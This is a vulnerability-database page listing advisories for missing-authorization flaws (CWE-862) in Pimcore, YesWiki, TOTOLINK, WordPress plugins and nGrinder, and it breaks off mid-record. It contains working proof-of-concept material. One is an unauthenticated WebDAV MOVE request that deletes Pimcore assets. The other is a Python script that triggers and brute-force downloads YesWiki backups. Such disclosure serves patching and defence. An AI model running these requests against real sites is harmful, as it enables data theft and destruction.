Common Weakness Enumeration

CWE-862

Allowed-with-Review

Missing Authorization

Abstraction: Class · Status: Incomplete

The product does not perform an authorization check when an actor attempts to access a resource or perform an action.

14579 vulnerabilities reference this CWE, most recent first.

GHSA-WC5V-66FR-QMW9

Vulnerability from github – Published: 2024-04-08 15:30 – Updated: 2024-11-19 21:31
VLAI
Details

TOTOLINK EX200 V4.0.3c.7646_B20201211 does not contain an authentication mechanism by default.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-31813"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-04-08T13:15:08Z",
    "severity": "HIGH"
  },
  "details": "TOTOLINK EX200 V4.0.3c.7646_B20201211 does not contain an authentication mechanism by default.",
  "id": "GHSA-wc5v-66fr-qmw9",
  "modified": "2024-11-19T21:31:30Z",
  "published": "2024-04-08T15:30:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31813"
    },
    {
      "type": "WEB",
      "url": "https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/EX200/Missing_Authentication/missauth.md"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WC7J-G8WX-M2QX

Vulnerability from github – Published: 2026-05-27 17:17 – Updated: 2026-07-10 19:08
VLAI
Summary
Pimcore: Missing Authorization in WebDAV MOVE via unchecked asset move handling
Details

Summary

Pimcore's WebDAV asset endpoint exposes a MOVE operation through /asset/webdav{path} without adding an authentication plugin in the WebDAV controller. The Tree::move() implementation then performs asset mutation and deletion before checking a current Pimcore user or any asset permissions.

An unauthenticated remote attacker who knows two existing asset paths in the same directory can send a WebDAV MOVE request that deletes the source asset. Authenticated low-privileged users may also be able to perform unauthorized asset move or overwrite operations because the move path does not enforce rename, delete, create, or publish permissions.

Details

The route for WebDAV is globally registered and accepts arbitrary trailing paths:

# bundles/CoreBundle/config/routing.yaml
pimcore_webdav:
    path: /asset/webdav{path}
    defaults: { _controller: Pimcore\Bundle\CoreBundle\Controller\WebDavController::webdavAction }
    requirements:
        path: '.*'

The controller constructs a SabreDAV server but only attaches lock and browser plugins. It does not attach an authentication plugin or perform an explicit user/session check before starting the server:

# bundles/CoreBundle/src/Controller/WebDavController.php
$publicDir = new Asset\WebDAV\Folder($homeDir);
$objectTree = new Asset\WebDAV\Tree($publicDir);
$server = new \Sabre\DAV\Server($objectTree);
$server->setBaseUri($this->generateUrl('pimcore_webdav', ['path' => '/']));
$server->addPlugin($lockPlugin);
$server->addPlugin(new \Sabre\DAV\Browser\Plugin());
$server->start();

Most WebDAV file and folder operations perform permission checks through isAllowed(), but Tree::move() does not. In the overwrite path for a same-directory move, it deletes the source asset before resolving the current user:

# models/Asset/WebDAV/Tree.php
if (dirname($sourcePath) == dirname($destinationPath)) {
    if ($asset = Asset::getByPath('/' . $destinationPath)) {
        $sourceAsset = Asset::getByPath('/' . $sourcePath);
        $asset->setData($sourceAsset->getData());
        $sourceAsset->delete();
    }
    ...
}

$user = \Pimcore\Tool\Admin::getCurrentUser();
$asset->setUserModification($user->getId());
$asset->save();

Asset::delete() removes the asset without an internal permission gate:

# models/Asset.php
public function delete(bool $isNested = false): void
{
    ...
    $this->getDao()->delete();
    ...
    $this->deletePhysicalFile();
}

Because the source asset deletion happens before $user->getId(), an unauthenticated request can still cause a deletion even if later execution fails when no current user is present.

PoC

Prerequisites:

  • Pimcore 2026.1.0 with the built-in WebDAV route enabled.
  • Two existing asset paths in the same directory, for example /products/source.jpg and /products/existing.jpg.
  • No valid session is required for the unauthenticated deletion path.

PoC request:

MOVE /asset/webdav/products/source.jpg HTTP/1.1
Host: target.example
Destination: http://target.example/asset/webdav/products/existing.jpg
Overwrite: T

Result:

The server will return an error after the deletion because Tree::move() later attempts to call $user->getId() when no current user exists. However, the source asset at /products/source.jpg has already been deleted by $sourceAsset->delete() before that failure point.

For an authenticated low-privileged backend user without sufficient asset permissions, the same request can also reach the unchecked move path and may overwrite the destination asset or move an asset without the expected per-asset permission checks.

Impact

This issue allows remote unauthorized destruction of assets when paths are known or guessable. In Pimcore deployments where assets represent product images, documents, media, or DAM-managed business content, deletion or unauthorized overwrite can cause data loss, content integrity loss, and service disruption.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 12.3.6"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "pimcore/pimcore"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "12.0.0-RC1"
            },
            {
              "fixed": "12.3.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "pimcore/pimcore"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2026.1.0"
            },
            {
              "fixed": "2026.1.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 11.5.16"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "pimcore/pimcore"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "11.5.17"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45260"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-27T17:17:18Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nPimcore\u0027s WebDAV asset endpoint exposes a `MOVE` operation through `/asset/webdav{path}` without adding an authentication plugin in the WebDAV controller. The `Tree::move()` implementation then performs asset mutation and deletion before checking a current Pimcore user or any asset permissions.\n\nAn unauthenticated remote attacker who knows two existing asset paths in the same directory can send a WebDAV `MOVE` request that deletes the source asset. Authenticated low-privileged users may also be able to perform unauthorized asset move or overwrite operations because the move path does not enforce `rename`, `delete`, `create`, or `publish` permissions.\n\n### Details\nThe route for WebDAV is globally registered and accepts arbitrary trailing paths:\n\n```yaml\n# bundles/CoreBundle/config/routing.yaml\npimcore_webdav:\n    path: /asset/webdav{path}\n    defaults: { _controller: Pimcore\\Bundle\\CoreBundle\\Controller\\WebDavController::webdavAction }\n    requirements:\n        path: \u0027.*\u0027\n```\n\nThe controller constructs a SabreDAV server but only attaches lock and browser plugins. It does not attach an authentication plugin or perform an explicit user/session check before starting the server:\n\n```php\n# bundles/CoreBundle/src/Controller/WebDavController.php\n$publicDir = new Asset\\WebDAV\\Folder($homeDir);\n$objectTree = new Asset\\WebDAV\\Tree($publicDir);\n$server = new \\Sabre\\DAV\\Server($objectTree);\n$server-\u003esetBaseUri($this-\u003egenerateUrl(\u0027pimcore_webdav\u0027, [\u0027path\u0027 =\u003e \u0027/\u0027]));\n$server-\u003eaddPlugin($lockPlugin);\n$server-\u003eaddPlugin(new \\Sabre\\DAV\\Browser\\Plugin());\n$server-\u003estart();\n```\n\nMost WebDAV file and folder operations perform permission checks through `isAllowed()`, but `Tree::move()` does not. In the overwrite path for a same-directory move, it deletes the source asset before resolving the current user:\n\n```php\n# models/Asset/WebDAV/Tree.php\nif (dirname($sourcePath) == dirname($destinationPath)) {\n    if ($asset = Asset::getByPath(\u0027/\u0027 . $destinationPath)) {\n        $sourceAsset = Asset::getByPath(\u0027/\u0027 . $sourcePath);\n        $asset-\u003esetData($sourceAsset-\u003egetData());\n        $sourceAsset-\u003edelete();\n    }\n    ...\n}\n\n$user = \\Pimcore\\Tool\\Admin::getCurrentUser();\n$asset-\u003esetUserModification($user-\u003egetId());\n$asset-\u003esave();\n```\n\n`Asset::delete()` removes the asset without an internal permission gate:\n\n```php\n# models/Asset.php\npublic function delete(bool $isNested = false): void\n{\n    ...\n    $this-\u003egetDao()-\u003edelete();\n    ...\n    $this-\u003edeletePhysicalFile();\n}\n```\n\nBecause the source asset deletion happens before `$user-\u003egetId()`, an unauthenticated request can still cause a deletion even if later execution fails when no current user is present.\n\n### PoC\nPrerequisites:\n\n- Pimcore 2026.1.0 with the built-in WebDAV route enabled.\n- Two existing asset paths in the same directory, for example `/products/source.jpg` and `/products/existing.jpg`.\n- No valid session is required for the unauthenticated deletion path.\n\nPoC request:\n\n```http\nMOVE /asset/webdav/products/source.jpg HTTP/1.1\nHost: target.example\nDestination: http://target.example/asset/webdav/products/existing.jpg\nOverwrite: T\n```\n\nResult:\n\nThe server will return an error after the deletion because `Tree::move()` later attempts to call `$user-\u003egetId()` when no current user exists. However, the source asset at `/products/source.jpg` has already been deleted by `$sourceAsset-\u003edelete()` before that failure point.\n\nFor an authenticated low-privileged backend user without sufficient asset permissions, the same request can also reach the unchecked move path and may overwrite the destination asset or move an asset without the expected per-asset permission checks.\n\n### Impact\nThis issue allows remote unauthorized destruction of assets when paths are known or guessable. In Pimcore deployments where assets represent product images, documents, media, or DAM-managed business content, deletion or unauthorized overwrite can cause data loss, content integrity loss, and service disruption.",
  "id": "GHSA-wc7j-g8wx-m2qx",
  "modified": "2026-07-10T19:08:21Z",
  "published": "2026-05-27T17:17:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pimcore/pimcore/security/advisories/GHSA-wc7j-g8wx-m2qx"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pimcore/pimcore/pull/19120"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pimcore/pimcore/commit/9d7c77fd9b19fa011ce470de95d4438e65007d99"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pimcore/pimcore"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pimcore/pimcore/releases/tag/v12.3.7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Pimcore: Missing Authorization in WebDAV MOVE via unchecked asset move handling"
}

GHSA-WC9C-673F-726H

Vulnerability from github – Published: 2025-09-10 09:30 – Updated: 2025-09-10 09:30
VLAI
Details

The WP Import – Ultimate CSV XML Importer for WordPress plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_ftp_details' AJAX action in all versions up to, and including, 7.27. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve a configured set of SFTP/FTP credentials.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-10040"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-09-10T07:15:43Z",
    "severity": "HIGH"
  },
  "details": "The WP Import \u2013 Ultimate CSV XML Importer for WordPress plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the \u0027get_ftp_details\u0027 AJAX action in all versions up to, and including, 7.27. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve a configured set of SFTP/FTP credentials.",
  "id": "GHSA-wc9c-673f-726h",
  "modified": "2025-09-10T09:30:57Z",
  "published": "2025-09-10T09:30:57Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10040"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/wp-ultimate-csv-importer/tags/7.26/uploadModules/FtpUpload.php#L231"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3357936/wp-ultimate-csv-importer/trunk/uploadModules/FtpUpload.php"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9bcdcaa4-c492-4d79-8d18-44802abd02e7?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WC9G-6J9W-HR95

Vulnerability from github – Published: 2025-04-29 14:41 – Updated: 2025-04-30 17:26
VLAI
Summary
YesWiki Vulnerable to Unauthenticated Site Backup Creation and Download
Details

Summary

The request to commence a site backup can be performed without authentication. Then these backups can also be downloaded without authentication.

The archives are created with a predictable filename, so a malicious user could create an archive and then download the archive without being authenticated.

Details

Create an installation using the instructions found in the docker folder of the repository, setup the site, and then send the request to create an archive, which you do not need to be authenticated for:

POST /?api/archives HTTP/1.1
Host: localhost:8085

action=startArchive&params%5Bsavefiles%5D=true&params%5Bsavedatabase%5D=true&callAsync=true

Then to retrieve it, make a simple GET request like to the correct URL:

http://localhost:8085/?api/archives/2025-04-12T14-34-01_archive.zip

A malicious attacker could simply fuzz this filename.

PoC

Here is a python script to fuzz this:

#!/usr/bin/env python3

import requests
import argparse
import datetime
import time
from urllib.parse import urljoin
from email.utils import parsedate_to_datetime
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Hardcoded proxy config for Burp Suite
BURP_PROXIES = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080"
}

def send_post_request(base_url, use_proxy=False):
    url = urljoin(base_url, "/?api/archives")
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36",
    }

    data = {
        "action": "startArchive",
        "params[savefiles]": "true",
        "params[savedatabase]": "true",
        "callAsync": "true"
    }

    proxies = BURP_PROXIES if use_proxy else None
    response = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)
    print(f"[+] Archive start response code: {response.status_code}")

    server_date = response.headers.get("Date")
    if server_date:
        ts = parsedate_to_datetime(server_date)
        print(f"[✓] Server time (from Date header): {ts.strftime('%Y-%m-%d %H:%M:%S')} UTC")
        return ts
    else:
        print("[!] Server did not return a Date header, falling back to local UTC.")
        return datetime.datetime.utcnow()

def try_download_files(base_url, timestamp, use_proxy=False):
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36",
    }

    proxies = BURP_PROXIES if use_proxy else None
    print("[*] Trying to download the archive with timestamp fuzzing (±10 seconds)...")

    base_ts = timestamp + datetime.timedelta(hours=2)

    time.sleep(30)  # delay to generate the archive

    for offset in range(-4, 15):
        ts = base_ts + datetime.timedelta(seconds=offset)
        filename = ts.strftime("%Y-%m-%dT%H-%M-%S_archive.zip")
        url = urljoin(base_url, f"/?api/archives/{filename}")
        print(f"[>] Trying: {url}")
        r = requests.get(url, headers=headers, proxies=proxies, verify=False)

        if r.status_code == 200 and r.headers.get("Content-Type", "").startswith("application/zip"):
            print(f"[✓] Archive found and downloaded: {filename}")
            with open(filename, "wb") as f:
                f.write(r.content)
            return

    print("[!] No archive found within the fuzzed window.")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Trigger archive and fetch resulting file with timestamp fuzzing.")
    parser.add_argument("host", help="Base host URL, e.g., http://localhost:8085")
    parser.add_argument("-p", "--proxy", action="store_true", help="Route requests through Burp Suite proxy at 127.0.0.1:8080")
    args = parser.parse_args()

    ts = send_post_request(args.host, use_proxy=args.proxy)
    print(f"[+] Archive request sent at (UTC): {ts.strftime('%Y-%m-%d %H:%M:%S')}")

    try_download_files(args.host, ts, use_proxy=args.proxy)

Impact

Denial of Service - A malicious attacker could simply make numerous requests to create archives and fill up the file system with archives.

Site Compromise - A malicious attacker can download the archive which will contain sensitive site information.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.5.3"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "yeswiki/yeswiki"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.5.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-46348"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287",
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-04-29T14:41:31Z",
    "nvd_published_at": "2025-04-29T21:15:52Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nThe request to commence a site backup can be performed without authentication. Then these backups can also be downloaded without authentication. \n\nThe archives are created with a predictable filename, so a malicious user could create an archive and then download the archive without being authenticated. \n\n### Details\n\nCreate an installation using the instructions found in the docker folder of the repository, setup the site, and then send the request to create an archive, which you do not need to be authenticated for: \n\n```\nPOST /?api/archives HTTP/1.1\nHost: localhost:8085\n\naction=startArchive\u0026params%5Bsavefiles%5D=true\u0026params%5Bsavedatabase%5D=true\u0026callAsync=true\n```\nThen to retrieve it, make a simple `GET` request like to the correct URL: \n```\nhttp://localhost:8085/?api/archives/2025-04-12T14-34-01_archive.zip\n```\nA malicious attacker could simply fuzz this filename.\n\n### PoC\nHere is a python script to fuzz this: \n\n```\n#!/usr/bin/env python3\n\nimport requests\nimport argparse\nimport datetime\nimport time\nfrom urllib.parse import urljoin\nfrom email.utils import parsedate_to_datetime\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n# Hardcoded proxy config for Burp Suite\nBURP_PROXIES = {\n    \"http\": \"http://127.0.0.1:8080\",\n    \"https\": \"http://127.0.0.1:8080\"\n}\n\ndef send_post_request(base_url, use_proxy=False):\n    url = urljoin(base_url, \"/?api/archives\")\n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36\",\n    }\n\n    data = {\n        \"action\": \"startArchive\",\n        \"params[savefiles]\": \"true\",\n        \"params[savedatabase]\": \"true\",\n        \"callAsync\": \"true\"\n    }\n\n    proxies = BURP_PROXIES if use_proxy else None\n    response = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)\n    print(f\"[+] Archive start response code: {response.status_code}\")\n\n    server_date = response.headers.get(\"Date\")\n    if server_date:\n        ts = parsedate_to_datetime(server_date)\n        print(f\"[\u2713] Server time (from Date header): {ts.strftime(\u0027%Y-%m-%d %H:%M:%S\u0027)} UTC\")\n        return ts\n    else:\n        print(\"[!] Server did not return a Date header, falling back to local UTC.\")\n        return datetime.datetime.utcnow()\n\ndef try_download_files(base_url, timestamp, use_proxy=False):\n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36\",\n    }\n\n    proxies = BURP_PROXIES if use_proxy else None\n    print(\"[*] Trying to download the archive with timestamp fuzzing (\u00b110 seconds)...\")\n\n    base_ts = timestamp + datetime.timedelta(hours=2)\n\n    time.sleep(30)  # delay to generate the archive\n\n    for offset in range(-4, 15):\n        ts = base_ts + datetime.timedelta(seconds=offset)\n        filename = ts.strftime(\"%Y-%m-%dT%H-%M-%S_archive.zip\")\n        url = urljoin(base_url, f\"/?api/archives/{filename}\")\n        print(f\"[\u003e] Trying: {url}\")\n        r = requests.get(url, headers=headers, proxies=proxies, verify=False)\n\n        if r.status_code == 200 and r.headers.get(\"Content-Type\", \"\").startswith(\"application/zip\"):\n            print(f\"[\u2713] Archive found and downloaded: {filename}\")\n            with open(filename, \"wb\") as f:\n                f.write(r.content)\n            return\n\n    print(\"[!] No archive found within the fuzzed window.\")\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(description=\"Trigger archive and fetch resulting file with timestamp fuzzing.\")\n    parser.add_argument(\"host\", help=\"Base host URL, e.g., http://localhost:8085\")\n    parser.add_argument(\"-p\", \"--proxy\", action=\"store_true\", help=\"Route requests through Burp Suite proxy at 127.0.0.1:8080\")\n    args = parser.parse_args()\n\n    ts = send_post_request(args.host, use_proxy=args.proxy)\n    print(f\"[+] Archive request sent at (UTC): {ts.strftime(\u0027%Y-%m-%d %H:%M:%S\u0027)}\")\n\n    try_download_files(args.host, ts, use_proxy=args.proxy)\n```\n\n### Impact\n\nDenial of Service - A malicious attacker could simply make numerous requests to create archives and fill up the file system with archives. \n\nSite Compromise - A malicious attacker can download the archive which will contain sensitive site information.",
  "id": "GHSA-wc9g-6j9w-hr95",
  "modified": "2025-04-30T17:26:00Z",
  "published": "2025-04-29T14:41:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/YesWiki/yeswiki/security/advisories/GHSA-wc9g-6j9w-hr95"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46348"
    },
    {
      "type": "WEB",
      "url": "https://github.com/YesWiki/yeswiki/commit/0d4efc880a727599fa4f6d7a64cc967afe475530"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/YesWiki/yeswiki"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "YesWiki Vulnerable to Unauthenticated Site Backup Creation and Download"
}

GHSA-WCCC-M55J-R27W

Vulnerability from github – Published: 2025-04-01 15:31 – Updated: 2026-04-01 18:34
VLAI
Details

Missing Authorization vulnerability in WebProtect.ai Astra Security Suite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Astra Security Suite: from n/a through 0.2.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-31774"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-04-01T15:16:14Z",
    "severity": "MODERATE"
  },
  "details": "Missing Authorization vulnerability in WebProtect.ai Astra Security Suite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Astra Security Suite: from n/a through 0.2.",
  "id": "GHSA-wccc-m55j-r27w",
  "modified": "2026-04-01T18:34:20Z",
  "published": "2025-04-01T15:31:40Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-31774"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/plugin/getastra/vulnerability/wordpress-astra-security-suite-plugin-0-2-broken-access-control-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WCF9-G27P-CXR6

Vulnerability from github – Published: 2026-01-22 18:30 – Updated: 2026-01-29 03:31
VLAI
Details

Missing Authorization vulnerability in merkulove Comparimager for Elementor comparimager-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Comparimager for Elementor: from n/a through <= 1.0.1.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-66142"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-22T17:16:01Z",
    "severity": "MODERATE"
  },
  "details": "Missing Authorization vulnerability in merkulove Comparimager for Elementor comparimager-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Comparimager for Elementor: from n/a through \u003c= 1.0.1.",
  "id": "GHSA-wcf9-g27p-cxr6",
  "modified": "2026-01-29T03:31:26Z",
  "published": "2026-01-22T18:30:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66142"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/comparimager-elementor/vulnerability/wordpress-comparimager-for-elementor-plugin-1-0-1-broken-access-control-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WCFR-CG3H-82R8

Vulnerability from github – Published: 2025-04-01 15:31 – Updated: 2026-04-01 18:34
VLAI
Details

Missing Authorization vulnerability in BeastThemes Clockinator Lite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Clockinator Lite: from n/a through 1.0.7.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-31777"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-04-01T15:16:15Z",
    "severity": "MODERATE"
  },
  "details": "Missing Authorization vulnerability in BeastThemes Clockinator Lite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Clockinator Lite: from n/a through 1.0.7.",
  "id": "GHSA-wcfr-cg3h-82r8",
  "modified": "2026-04-01T18:34:20Z",
  "published": "2025-04-01T15:31:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-31777"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/plugin/clockify-lite/vulnerability/wordpress-clockinator-lite-plugin-1-0-7-broken-access-control-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WCJF-C77R-W723

Vulnerability from github – Published: 2024-11-01 15:31 – Updated: 2024-11-01 15:31
VLAI
Details

Missing Authorization vulnerability in ReviewX allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects ReviewX: from n/a through 1.6.28.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-43323"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-11-01T15:15:47Z",
    "severity": "MODERATE"
  },
  "details": "Missing Authorization vulnerability in ReviewX allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects ReviewX: from n/a through 1.6.28.",
  "id": "GHSA-wcjf-c77r-w723",
  "modified": "2024-11-01T15:31:59Z",
  "published": "2024-11-01T15:31:59Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43323"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/reviewx/wordpress-reviewx-plugin-1-6-28-broken-access-control-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WCM8-F742-J3XH

Vulnerability from github – Published: 2026-03-21 06:30 – Updated: 2026-03-21 06:30
VLAI
Details

The Hr Press Lite plugin for WordPress is vulnerable to unauthorized access of sensitive employee data due to a missing capability check on the hrp-fetch-employees AJAX action in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve sensitive employee information including names, email addresses, phone numbers, salary/pay rates, employment dates, and employment status.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-2720"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-21T04:17:11Z",
    "severity": "MODERATE"
  },
  "details": "The Hr Press Lite plugin for WordPress is vulnerable to unauthorized access of sensitive employee data due to a missing capability check on the `hrp-fetch-employees` AJAX action in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve sensitive employee information including names, email addresses, phone numbers, salary/pay rates, employment dates, and employment status.",
  "id": "GHSA-wcm8-f742-j3xh",
  "modified": "2026-03-21T06:30:24Z",
  "published": "2026-03-21T06:30:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2720"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/hr-press-lite/tags/1.0.2/admin/admin.php#L36"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/hr-press-lite/tags/1.0.2/includes/HRP_Action.php#L1444"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/hr-press-lite/trunk/admin/admin.php#L36"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/hr-press-lite/trunk/includes/HRP_Action.php#L1444"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d2a63b8e-e16e-4702-be1b-acc5c3e74b22?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WCMH-GHJH-4J2H

Vulnerability from github – Published: 2024-03-07 06:30 – Updated: 2024-08-12 21:31
VLAI
Details

nGrinder before 3.5.9 allows an attacker to obtain the results of webhook requests due to lack of access control, which could be the cause of information disclosure and limited Server-Side Request Forgery.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-28216"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284",
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-03-07T05:15:55Z",
    "severity": "MODERATE"
  },
  "details": "nGrinder before 3.5.9 allows an attacker to obtain the results of webhook requests due to lack of access control, which could be the cause of information disclosure and limited Server-Side Request Forgery.",
  "id": "GHSA-wcmh-ghjh-4j2h",
